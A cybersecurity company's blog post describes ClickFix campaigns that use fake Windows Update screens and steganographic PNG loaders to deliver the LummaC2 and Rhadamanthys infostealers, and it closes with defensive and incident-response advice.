Recently, new variants of the ClickFix attack have been detected, where cybercriminals display a fake full-screen Windows Update animation within the browser. At first glance, it looks like a legitimate update, but behind the scenes, malicious code is hidden inside images.
Essentially, ClickFix is a social engineering attack: the user is tricked into copying and running commands in the Windows Command Prompt, which silently triggers the malware installation.
What’s concerning is that this method has become very popular among attackers, ranging from beginners to advanced groups. Its effectiveness is so high that the tactics are constantly evolving, with increasingly polished and convincing decoys designed to lure users into the trap.
Some ClickFix variants use a highly convincing trick: displaying a supposed “critical Windows security update” in full-screen mode within the browser. In other cases, it’s even combined with the classic “human verification” prompt, making the whole setup seem completely legitimate.
This fake screen guides the victim step by step, instructing them to press certain keys in a specific order. What many don’t realize is that the page has already copied dangerous commands to the clipboard using JavaScript. By following the instructions, the user ends up pasting and executing those commands unknowingly, giving the attacker direct access to run malware on the system.
Fake windows security update screen (Source: BleepingComputer)
The new variants of ClickFix are exhibiting much more aggressive behavior: they now install information stealers like LummaC2 and Rhadamanthys, two of the most commonly used infostealers in recent campaigns.
In some cases, attackers use the typical “human verification” page; in others, the trap is a fake Windows Update screen. While the visual trick may vary, the goal remains the same: to get the user to accidentally execute the code that triggers the infection.
What stands out the most is that the final malware doesn’t arrive as a traditional executable file, but rather hidden inside an image using steganography. Instead of adding suspicious data to the file, the malicious code is embedded directly into the pixels of the PNG, using specific color channels to reconstruct and decrypt the payload in memory.
The attack begins by using mshta, a legitimate Windows tool, to execute malicious JavaScript. From there, the process goes through several stages combining PowerShell with a .NET assembly known as Stego Loader, which is responsible for extracting the hidden payload from the encrypted PNG.
This Stego Loader contains, in its internal resources, an AES-encrypted block that is actually the steganographic PNG file. From there, it reconstructs shellcode using custom C#.
Adding to this is an evasion technique known as ctrampoline. Essentially, the program’s initial function starts calling thousands of empty functions—literally around 10,000—to confuse analysis and make detection by security tools more difficult.
ctrampoline call chain (Source: Huntress)
Read more: Sturnus: New Android Trojan That Spies on WhatsApp and Telegram
The shellcode containing the infostealer samples is extracted directly from the encrypted image and then packed with Donut, a widely used tool for loading files such as VBScript, JScript, EXE, DLL, or .NET assemblies into memory without writing them to disk.
Once the package is unpacked, the complete malware can be recovered. In the analyzed cases, the identified variants were LummaC2 and Rhadamanthys—two infostealers known for their ability to steal credentials, browser data, and other sensitive information.
Below is a diagram that visually summarizes how the entire attack is carried out:
Attack Overview (Source: Huntress)
The Rhadamanthys variant that used the fake Windows Update screen began appearing in early October. Shortly after, in November, part of the malware’s infrastructure was taken down following Operation Endgame. This halted the distribution of the malicious payload from the domains impersonating Windows Update, although those sites remain online.
At TecnetOne, we remind users that avoiding ClickFix-style attacks requires applying very simple yet effective preventive measures: disabling the Windows “Run” dialog on machines where it’s not needed, and monitoring suspicious processes—such as explorer.exe launching mshta.exe or unexpected PowerShell executions.
Additionally, if there’s a need to investigate a potential incident, one of the first useful checks is reviewing the RunMRU registry key, which stores a history of commands executed from the “Run” dialog. This can reveal whether the user pasted or ran any commands that may have triggered the infection.
The ClickFix attack, disguised as a Windows update, shows just how creative cybercriminals can be when it comes to tricking users. If you see an “update” in your browser asking you to run commands or press keys outside the official Windows Update panel, be immediately suspicious and don’t follow any instructions.
At TecnetOne, we recommend maintaining a preventive posture: educate users, block unauthorized commands, filter malicious content, monitor suspicious processes, and keep backups up to date. And if you believe you’ve been a victim of an attack like this, contact us—our incident response service can help you contain, analyze, and resolve the issue so you can get back to operating safely.